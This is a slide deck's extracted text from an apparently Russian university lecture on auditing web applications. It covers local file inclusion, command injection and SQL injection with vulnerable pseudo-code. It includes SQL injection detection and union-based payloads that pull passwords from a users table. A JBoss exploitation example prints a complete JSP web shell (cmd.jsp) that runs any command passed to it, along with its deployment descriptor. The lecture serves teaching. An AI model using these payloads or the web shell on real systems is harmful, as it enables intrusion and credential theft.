Безопасность интернет-приложений осень 2013 лекция 3

57 %
43 %
Information about Безопасность интернет-приложений осень 2013 лекция 3
Education

Published on March 2, 2014

Author: Technopark

Source: slideshare.net

Безопасность интернет-приложений Лекция 3, «аудит web-приложений»

Стадии анализа Гипотеза нет Проверка да Цель достигнута 2

Источники проблем GET/POST – параметры File uploads Cookies Headers External sources 3

Основные атаки - Раскрытие информации LFI/RFI Command injection SQL Injection Загрузка произвольного файла 4

LFI … Name = query; Print(LoadFile(Name)); … http://target.com?getfile=valid http://target.com?getfile=invalid 5

LFI http://target.com?getfile=index 6

LFI http://target.com?getfile=index http://target.com?getfile=target 7

LFI … Name = query + “.txt”; Print(LoadFile(Name)); … 8

LFI … Name = query + “.txt”; Print(LoadFile(Name)); … 9

command injection … Param = query; System(“ping –c 1 ”+param); … 10

command injection … Param = query; System(“ping –c 1 ”+param); … 11

command injection … Param = query; System(“ping –c 1 ”+param); … 12

SQL Injection … Q = “select username from users where id=“ + req_id; print(db_query(Q)); … Detect: ‘ and 1=1 / ‘ and 1=0 ‘ and benchmark (9999999,md5(1)) Exploit: ‘ union select 1,2,3,4,5 from table2 – comment out http://target.com/?id=-1 union select password from users -- c select username from users where id=-1 union select password from users -- c 13

пример: JBoss Сканирование: 14

пример: JBoss Идентификация: 15

пример: JBoss Уязвимость: 16

пример: JBoss Уязвимость: 17

пример: JBoss Эксплуатация: 18

пример: JBoss cmd.jsp: <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %></pre></BODY></HTML> 19

пример: JBoss WEB-INF/web.xml: <?xml version="1.0" ?> <web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4"> <servlet> <servlet-name>Command</servlet-name> <jsp-file>/cmd.jsp</jsp-file> </servlet> </web-app> 20

пример: JBoss Эксплуатация: 21

пример: JBoss Эксплуатация: 22

пример: JBoss Результат: 23

Add a comment

Related presentations

Related pages

IT.Mail.Ru

3.5 Безопасность веб ... Курс "Безопасность интернет-приложений" (осень 2014) Лекция 3.5 ...
Read more

3.3 Безопасность веб-приложений ...

... интернет-приложений" ... (осень 2014) Лекция 3.3 ... 5.3 Безопасность веб ...
Read more

Византийская эстетика ...

Безопасность интернет-приложений осень 2013 лекция 3 A particular slide catching your eye?
Read more

Web осень 2012 лекция 3 - Documents

Безопасность Web приложений Дмитрий ... Web осень 2013 лекция 3 1. ... Web осень 2013 лекция 6 1.
Read more

Лекция 3. Пожарная безопасность ...

Лекция 3. Пожарная безопасность. ... Лекция № 3.2. ... осень-зима) ...
Read more

Безопасность интернет ...

Безопасность интернет-приложений. Лекция 5_7. ... Лекция 6_3. Whitebox.
Read more

Безопасность интернет ...

Безопасность интернет-приложений. ... Безопасность интернет-приложений. ... Лекция 1_3.
Read more